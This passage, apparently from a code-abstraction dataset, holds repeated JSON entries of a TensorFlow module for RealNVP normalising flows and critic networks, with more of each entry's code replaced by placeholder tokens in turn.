**dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n<class token>\n\n\nclass LayerNorm(tfkl.Layer):\n <docstring token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], 
x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
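For ConvNet the entries only show the constructor, but the shape flow is straightforward to reconstruct: assuming DIMS // 2 = 392 so the input reshapes to 14x28x1, the two stride-2 convolutions with 'same' padding halve each spatial dimension (rounded up) before global average pooling and the final Dense. A small sketch of that arithmetic:

import math

def conv_shapes(h=14, w=28, channels=64, strides=(2, 2)):
    shapes = [(h, w, 1)]
    for i, s in enumerate(strides):
        h, w = math.ceil(h / s), math.ceil(w / s)
        shapes.append((h, w, channels * (2 ** i)))
    return shapes

print(conv_shapes())   # [(14, 28, 1), (7, 14, 64), (4, 7, 128)]
# global average pooling then collapses (4, 7, 128) to a 128-vector,
# and the final Dense maps it to the output_dim-dimensional representation.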
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n<class token>\n<class token>\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n 
**condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n<class token>\n<class token>\n\n\nclass ConvNet(tf.keras.Sequential):\n <function token>\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, 
n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n<class token>\n<class token>\n<class token>\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n 
super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n<class token>\n<class token>\n<class token>\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n <function token>\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + 
[1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n<class token>\n<class token>\n<class token>\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n <function token>\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to 